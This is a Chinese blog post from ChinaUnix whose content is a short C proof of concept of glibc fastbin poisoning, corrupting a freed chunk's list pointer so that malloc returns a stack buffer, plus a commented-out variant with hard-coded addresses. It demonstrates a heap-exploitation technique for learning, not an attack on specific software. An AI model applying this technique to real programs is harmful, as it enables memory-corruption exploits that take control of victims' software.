Chinaunix首页 | 论坛 | 博客

收到

首页 |  博文目录 |  关于我

收到

  • 博客访问: 17918
  • 博文数量: 2
  • 博客积分: 15
  • 博客等级: 民兵
  • 技术积分: 30
  • 用 户 组: 普通用户
  • 注册时间: 2011-07-17 02:00
个人简介

.........................

文章分类

全部博文(2)

文章存档

2016年(1)

2015年(1)

我的朋友
最近访客
推荐博文
相关博文
Linux堆溢出之fastbin控制malloc返回地址

分类: LINUX

2016-06-19 18:48:50


点击(此处)折叠或打开

  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <pthread.h>

  7. void *thread0(void *param)
  8. {
  9.     char buf[100]={0};
  10.     *((int*)buf+1)=0x2d;
  11.     void *buf0,*buf1,*buf2,*ptr;
  12.     buf0=malloc(32);
  13.     buf1=malloc(32);
  14.     free(buf1);
  15.     free(buf0);
  16.     buf0 = malloc(32);
  17.     ptr=(void*)((*(int*)buf0)+8);
  18.     
  19.     *(int*)ptr=(int)&buf[0];
  20.     buf1 = malloc(32);
  21.     buf2 = malloc(32); //buf2为&buf[0]地址
  22.     memset(buf2,0xff,40);
  23.     printf("kkkkkk\n");
  24.     pthread_exit((void*)0);
  25. }
  26. /*
  27.  *
  28.  */
  29. int main(int argc, char** argv) {
  30.     pthread_t tid;
  31.     pthread_attr_t attr;
  32.     pthread_attr_init(&attr);
  33.     pthread_attr_setdetachstate(&attr,PTHREAD_CREATE_DETACHED);
  34.     pthread_create(&tid,&attr,thread0,(void*)0);
  35.     pthread_attr_destroy(&attr);
  36.     sleep(60000);

  38. /*
  39.     char buf[100]={0};
  40.     *((int*)buf+1)=0x29;
  41.     int *pppp=&buf[0];
  42.     void *buf0,*buf1,*buf2;
  43.     buf0=malloc(32);
  44.     buf1=malloc(32);
  45.     free(buf1);
  46.     free(buf0);
  47.     buf0 = malloc(32);
  48.     memset(buf0,1,32);
  49.     int *ptr=0x0804a030;
  50.     *ptr=0xbffff588;
  51.     buf1 = malloc(32);
  52.     memset(buf1,2,32);
  53.     buf2 = malloc(32);
  54.     memset(buf2,4,40);
  55.     printf("kkkkkk\n");
  56. */
  57.     return (EXIT_SUCCESS);
  58. }


阅读(1805) | 评论(0) | 转发(0) |
0

上一篇:linux利用PLT延迟绑定

下一篇:没有了

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6